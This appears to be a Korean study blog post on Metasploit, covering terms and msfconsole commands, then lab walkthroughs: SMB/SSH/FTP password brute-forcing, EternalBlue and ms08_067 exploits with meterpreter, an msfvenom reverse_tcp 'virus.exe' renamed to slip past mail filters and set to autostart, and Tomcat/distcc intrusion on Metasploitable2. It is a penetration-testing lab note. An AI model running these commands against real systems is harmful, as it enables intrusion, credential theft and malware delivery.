[메타스플로잇]
01. 특징
- 취약점 분석, 자동화, 보안식별
02. 활용
- 취약점 분석,진단,침투 테스트
03. 용어정리
1) 익스플로잇(Exploit) : 시스템, 서비스 공격 방법(행위)
2) 페이로드(Payload) : 공격 코드
3) 모듈 : 루비(Ruby)언어의 모듈
4) 세션 : 공격자와 공격 대상자와의 연결
04. 라이브러리/모듈
05. 모듈
1) Exploit
2) auxiliary : 보조 모듈
3) Post: 2차공격
4) Payload : 공격 코드
06. 인터페이스
1) GUI : armitage
2) TUI(CLI) : msfconsole
3) msfcli
4) msfweb
07. msfconsole 명령어
1) help : 도움말
2) search : 모듈 검색
3) use : 특정 모듈 연결
4) info : 정보 출력
5) set : 모든 설정
6) show : 출력
7) exploit : 모듈 실행, 공격 명령
[칼리리눅스]
msfdb init //최초 한번만 실행해주면 된다.
service postgresql restart //최초 한번만 해주면 된다.
systemctl enable postgresql
db_status //db 연결
apt-get install -y metasploit-framework zlib1g.dev libpcap-dev libsqlite-dev openssl //업데이트
msfconsole //실행
use auxiliary/scanner/smb/smb_version // smb scan
options
//설정할 것을 확인할 수 있음. yes로 되어있는 것은 필수로 설정해줘야함
set rhosts 192.168.232.120 //rhost로 공격대상자 ip 설정
set threads 256 //스레드 256개 즉 , 속도 빨라짐
options //확인
run 실행 //스캐닝 확인 운영체제와 사용자이름 워크그룹등 확인
back 맨 처음으로 돌아감.
use auxiliary/scanner/ssh/ssh_version //ssh 스캔
set rhosts 192.168.232.130
run
[무작위 대입 공격]
[windows7]
use auxiliary/scanner/smb/smb_login
option //설정할 것 찾기.
set rhosts 192.168.232.120
set smbuser test
set smbpass root
run //실행
사전파일 생성후, 사전파일로 비번찾기
(id는 userpass_file)
use auxiliary/scanner/smb/smb_login
set username test
set pass_file /root/passwd.txt //test비번을 사전파일에 있는 거로 찾는다.
run //실행
msf5 > use auxiliary/scanner/ssh/ssh_login
set username test
set password root
set stop_on_success true //비밀번호를 찾으면 멈춤
run //실행파일
사전파일 생성후, 사전파일로 비번찾기
사전파일 위치 /root/passwd.txt
set rhosts 192.168.232.210
set username test
set pass_file /root/passwd.txt //test비번을 사전파일에 있는 거로 찾는다.
run //실행
[ftp로 비번찾기]
난 ftp포트를 2121로 변경했기 때문에 변경까지했다.
set rport 2121
set rhosts 192.168.232.210
set username test
set pass_file /root/passwd.txt
run
id와 비번 둘다 사전파일로 찾기.
set rport 2121
set rhosts 192.168.232.210
set username test
set pass_file /root/passwd.txt
set user_file /root/id.txt
run
[취약점 코드]
-국제 공통 코드 : CVE-2018-0123 //2018년에발생 123번째
- MS사 : ms08-0123
// ms17_010 == 국제 공통 코드 CVE-2017-0143
[상대방 windows 7로 직접 침투]
//ms 17년에 10번째 블루스크린을 뜨게함.
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
meterpreter > shell //windows7 에 접속
//mkdir hi로 파일을 만듦.
//아래와 같이 생성됨.
set payload windows/x64/shell/bind_tcp
exploit //실행
[상대방 windows xp로 직접 침투]
use exploit /windows/smb/ms08_067_netapi
set payload windows/meterpreter/bind_tcp
set rhosts 100.100.100.138 //공격대상자 아이피
set lport 443
exploit
meterpreter shell 입력 //원격접속
이미지와 같이 폴더가 생성됨.
[reverse_tcp]
악성코드를 만들어야한다.
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.232.100 lport=4444 -f exe > /root/virus.exe
//테스트를 위해 직접 옮긴 것이다.
만든 virus.exe 파일을 공격대상자 컴퓨터에 옮긴다.
exe파일은 메일에서 차단할 수 있으므로 zip으로 이름을 변경하여 보냄.
파일확장자명 exe로 변경
windows7에서 아까 옮긴 바이러스 파일을 실행.
shell:startup //부팅 시에 자동으로 실행되게함.
sysinfo //원격접속한 컴퓨터의 정보확인
https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
metasploitable2 //취약점 모아놓은 툴
다운받고 vmware로 오픈
login msfadmin
pass msfadmin
sudo -s
msfadmin //root접속
[톰캣을 통해 리눅스 시스템 진입]
192.168.232.233(metasploitable2ip):8180
[비번 찾기]
use auxiliary/scanner/http/tomcat_mgr_login
tomcat: tomcat
ls cat 명령어 다사용 가능
cat /etc/passwd
[일반유저 권한으로 리눅스침투]
use exploit/unix/misc/distcc_exec
set payload cmd/unix/bind_ruby
set rhosts 192.168.232.233
exploit
set payload cmd/unix/bind_ruby
set rhosts 192.168.232.233
exploit
'System Security' 카테고리의 다른 글
웹게시판 (0) | 2019.03.04 |
---|---|
apmtools(apache) (0) | 2019.03.04 |
DNS서버 (0) | 2019.02.27 |
FTP (2) | 2019.02.26 |
NFS(Network File System) (0) | 2019.02.25 |